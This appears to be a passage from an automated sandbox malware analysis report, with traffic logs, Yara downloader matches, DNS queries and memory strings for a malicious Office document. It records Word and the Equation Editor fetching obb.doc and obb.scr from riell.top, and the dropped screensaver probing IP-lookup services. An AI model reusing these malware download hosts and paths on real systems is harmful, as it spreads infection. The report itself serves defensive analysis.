            Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 192.168.2.22:49167 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49167
            Source: global trafficTCP traffic: 192.168.2.22:49167 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49167 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49167
            Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49167
            Source: global trafficTCP traffic: 192.168.2.22:49167 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49167 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49167
            Source: global trafficTCP traffic: 192.168.2.22:49167 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49167
            Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49167
            Source: global trafficTCP traffic: 192.168.2.22:49167 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49167
            Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49167
            Source: global trafficTCP traffic: 192.168.2.22:49167 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49167 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49167 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49167
            Source: global trafficTCP traffic: 192.168.2.22:49167 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49167 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49168
            Source: global trafficTCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49168
            Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49168
            Source: global trafficTCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49168
            Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49168
            Source: global trafficTCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49168
            Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49168
            Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49168
            Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49168
            Source: global trafficTCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49168
            Source: global trafficTCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49168
            Source: global trafficTCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49168
            Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49168
            Source: global trafficTCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49168
            Source: global trafficTCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49168
            Source: global trafficTCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49168
            Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49168
            Source: global trafficTCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49168
            Source: global trafficTCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49168
            Source: global trafficTCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49168
            Source: global trafficTCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49168
            Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49168
            Source: global trafficTCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49168
            Source: global trafficTCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49168
            Source: global trafficTCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49168
            Source: global trafficTCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49168
            Source: global trafficTCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49168
            Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49168
            Source: global trafficTCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49168
            Source: global trafficTCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49168
            Source: global trafficTCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49168
            Source: global trafficTCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49168
            Source: global trafficTCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49168
            Source: global trafficTCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49168
            Source: global trafficTCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49168
            Source: global trafficTCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49168
            Source: global trafficTCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49168
            Source: global trafficTCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49168
            Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49168
            Source: global trafficTCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49168
            Source: global trafficTCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49168
            Source: global trafficTCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49168
            Source: global trafficTCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49168
            Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49168
            Source: global trafficTCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49168
            Source: global trafficTCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49168
            Source: global trafficTCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49168
            Source: global trafficTCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443

            Networking

            barindex
            Yara detected Generic Downloader
            Source: Yara matchFile source: 11.2.obi23456.scr.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 10.2.obi23456.scr.34b7a20.7.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 10.2.obi23456.scr.34971f0.5.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 10.2.obi23456.scr.3407b70.6.raw.unpack, type: UNPACKEDPE
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: Joe Sandbox ViewIP Address: 132.226.8.169 132.226.8.169
            Source: Joe Sandbox ViewIP Address: 188.114.97.3 188.114.97.3
            Source: Joe Sandbox ViewIP Address: 188.114.97.3 188.114.97.3
            Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
            Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
            Source: Joe Sandbox ViewJA3 fingerprint: 05af1f5ca1b87cc9cc9b25185115607d
            Source: Joe Sandbox ViewJA3 fingerprint: 7dcce5b76c8b17472d024758970a406b
            Source: C:\Users\user\AppData\Roaming\obi23456.scrDNS query: name: checkip.dyndns.org
            Source: C:\Users\user\AppData\Roaming\obi23456.scrDNS query: name: checkip.dyndns.org
            Source: C:\Users\user\AppData\Roaming\obi23456.scrDNS query: name: checkip.dyndns.org
            Source: C:\Users\user\AppData\Roaming\obi23456.scrDNS query: name: checkip.dyndns.org
            Source: C:\Users\user\AppData\Roaming\obi23456.scrDNS query: name: reallyfreegeoip.org
            Source: C:\Users\user\AppData\Roaming\obi23456.scrDNS query: name: checkip.dyndns.org
            Source: C:\Users\user\AppData\Roaming\obi23456.scrDNS query: name: checkip.dyndns.org
            Source: C:\Users\user\AppData\Roaming\obi23456.scrDNS query: name: checkip.dyndns.org
            Source: C:\Users\user\AppData\Roaming\obi23456.scrDNS query: name: checkip.dyndns.org
            Source: C:\Users\user\AppData\Roaming\obi23456.scrDNS query: name: reallyfreegeoip.org
            Source: C:\Users\user\AppData\Roaming\obi23456.scrDNS query: name: reallyfreegeoip.org
            Source: C:\Users\user\AppData\Roaming\obi23456.scrDNS query: name: checkip.dyndns.org
            Source: C:\Users\user\AppData\Roaming\obi23456.scrDNS query: name: checkip.dyndns.org
            Source: C:\Users\user\AppData\Roaming\obi23456.scrDNS query: name: checkip.dyndns.org
            Source: C:\Users\user\AppData\Roaming\obi23456.scrDNS query: name: checkip.dyndns.org
            Source: C:\Users\user\AppData\Roaming\obi23456.scrDNS query: name: reallyfreegeoip.org
            Source: C:\Users\user\AppData\Roaming\obi23456.scrDNS query: name: checkip.dyndns.org
            Source: C:\Users\user\AppData\Roaming\obi23456.scrDNS query: name: checkip.dyndns.org
            Source: C:\Users\user\AppData\Roaming\obi23456.scrDNS query: name: checkip.dyndns.org
            Source: C:\Users\user\AppData\Roaming\obi23456.scrDNS query: name: checkip.dyndns.org
            Source: C:\Users\user\AppData\Roaming\obi23456.scrDNS query: name: reallyfreegeoip.org
            Source: C:\Users\user\AppData\Roaming\obi23456.scrDNS query: name: checkip.dyndns.org
            Source: C:\Users\user\AppData\Roaming\obi23456.scrDNS query: name: checkip.dyndns.org
            Source: C:\Users\user\AppData\Roaming\obi23456.scrDNS query: name: checkip.dyndns.org
            Source: C:\Users\user\AppData\Roaming\obi23456.scrDNS query: name: checkip.dyndns.org
            Source: C:\Users\user\AppData\Roaming\obi23456.scrDNS query: name: reallyfreegeoip.org
            Source: C:\Users\user\AppData\Roaming\obi23456.scrDNS query: name: checkip.dyndns.org
            Source: C:\Users\user\AppData\Roaming\obi23456.scrDNS query: name: checkip.dyndns.org
            Source: C:\Users\user\AppData\Roaming\obi23456.scrDNS query: name: checkip.dyndns.org
            Source: C:\Users\user\AppData\Roaming\obi23456.scrDNS query: name: checkip.dyndns.org
            Source: C:\Users\user\AppData\Roaming\obi23456.scrDNS query: name: reallyfreegeoip.org
            Source: C:\Users\user\AppData\Roaming\obi23456.scrDNS query: name: checkip.dyndns.org
            Source: C:\Users\user\AppData\Roaming\obi23456.scrDNS query: name: checkip.dyndns.org
            Source: C:\Users\user\AppData\Roaming\obi23456.scrDNS query: name: checkip.dyndns.org
            Source: C:\Users\user\AppData\Roaming\obi23456.scrDNS query: name: checkip.dyndns.org
            Source: C:\Users\user\AppData\Roaming\obi23456.scrDNS query: name: reallyfreegeoip.org
            Source: global trafficHTTP traffic detected: GET /obb.doc HTTP/1.1Accept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; ms-office; MSOffice 14)UA-CPU: AMD64Accept-Encoding: gzip, deflateHost: riell.topConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /obb.scr HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: riell.topConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.22:49162 version: TLS 1.0
            Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.22:49163 version: TLS 1.0
            Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.22:49163 version: TLS 1.0
            Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.22:49164 version: TLS 1.0
            Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.22:49165 version: TLS 1.0
            Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.22:49170 version: TLS 1.0
            Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.22:49171 version: TLS 1.0
            Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.22:49173 version: TLS 1.0
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{E99E1800-284E-46BB-8918-39BEC0D2E5EE}.tmpJump to behavior
            Source: global trafficHTTP traffic detected: GET /obb.doc HTTP/1.1Accept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; ms-office; MSOffice 14)UA-CPU: AMD64Accept-Encoding: gzip, deflateHost: riell.topConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /obb.scr HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: riell.topConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: EQNEDT32.EXE, 00000009.00000003.412444845.000000000097E000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000009.00000002.412653701.000000000097E000.00000004.00000020.00020000.00000000.sdmp, obi23456.scr, 0000000B.00000002.937364961.0000000000364000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)
            Source: global trafficDNS traffic detected: DNS query: riell.top
            Source: global trafficDNS traffic detected: DNS query: checkip.dyndns.org
            Source: global trafficDNS traffic detected: DNS query: reallyfreegeoip.org
            Source: obi23456.scr, 0000000B.00000002.937566804.0000000002327000.00000004.00000800.00020000.00000000.sdmp, obi23456.scr, 0000000B.00000002.937566804.00000000023DA000.00000004.00000800.00020000.00000000.sdmp, obi23456.scr, 0000000B.00000002.937566804.0000000002415000.00000004.00000800.00020000.00000000.sdmp, obi23456.scr, 0000000B.00000002.937566804.00000000023BB000.00000004.00000800.00020000.00000000.sdmp, obi23456.scr, 0000000B.00000002.937566804.00000000023C8000.00000004.00000800.00020000.00000000.sdmp, obi23456.scr, 0000000B.00000002.937566804.0000000002423000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.com
            Source: obi23456.scr, 0000000B.00000002.937566804.0000000002327000.00000004.00000800.00020000.00000000.sdmp, obi23456.scr, 0000000B.00000002.937566804.00000000023DA000.00000004.00000800.00020000.00000000.sdmp, obi23456.scr, 0000000B.00000002.937566804.000000000236A000.00000004.00000800.00020000.00000000.sdmp, obi23456.scr, 0000000B.00000002.937566804.0000000002415000.00000004.00000800.00020000.00000000.sdmp, obi23456.scr, 0000000B.00000002.937566804.00000000023BB000.00000004.00000800.00020000.00000000.sdmp, obi23456.scr, 0000000B.00000002.937566804.00000000023C8000.00000004.00000800.00020000.00000000.sdmp, obi23456.scr, 0000000B.00000002.937566804.0000000002423000.00000004.00000800.00020000.00000000.sdmp, obi23456.scr, 0000000B.00000002.937566804.000000000231B000.00000004.00000800.00020000.00000000.sdmp, obi23456.scr, 0000000B.00000002.937566804.00000000023F5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org
            Source: obi23456.scr, 0000000B.00000002.937566804.0000000002281000.00000004.00000800.00020000.00000000.sdmp, obi23456.scr, 0000000B.00000002.937364961.0000000000364000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/
            Source: obi23456.scr, 0000000A.00000002.417577947.00000000033B9000.00000004.00000800.00020000.00000000.sdmp, obi23456.scr, 0000000B.00000002.937442781.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/q
            Source: EQNEDT32.EXE, 00000009.00000003.412444845.000000000097E000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000009.00000002.412653701.000000000097E000.00000004.00000020.00020000.00000000.sdmp, obi23456.scr, 0000000B.00000002.937905097.0000000005444000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
            Source: EQNEDT32.EXE, 00000009.00000003.412444845.000000000097E000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000009.00000002.412653701.000000000097E000.00000004.00000020.00020000.00000000.sdmp, obi23456.scr, 0000000B.00000002.937364961.0000000000364000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/UTN-USERFirst-Hardware.crl06
            Source: EQNEDT32.EXE, 00000009.00000003.412444845.000000000097E000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000009.00000002.412653701.000000000097E000.00000004.00000020.00020000.00000000.sdmp, obi23456.scr, 0000000B.00000002.937364961.0000000000364000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.entrust.net/2048ca.crl0
            Source: EQNEDT32.EXE, 00000009.00000003.412444845.000000000097E000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000009.00000002.412653701.000000000097E000.00000004.00000020.00020000.00000000.sdmp, obi23456.scr, 0000000B.00000002.937364961.0000000000364000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.entrust.net/server1.crl0
            Source: EQNEDT32.EXE, 00000009.00000003.412444845.000000000097E000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000009.00000002.412653701.000000000097E000.00000004.00000020.00020000.00000000.sdmp, obi23456.scr, 0000000B.00000002.937905097.0000000005444000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
            Source: EQNEDT32.EXE, 00000009.00000003.412444845.000000000097E000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000009.00000002.412653701.000000000097E000.00000004.00000020.00020000.00000000.sdmp, obi23456.scr, 0000000B.00000002.937364961.0000000000364000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
            Source: EQNEDT32.EXE, 00000009.00000003.412444845.000000000097E000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000009.00000002.412653701.000000000097E000.00000004.00000020.00020000.00000000.sdmp, obi23456.scr, 0000000B.00000002.937364961.0000000000364000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
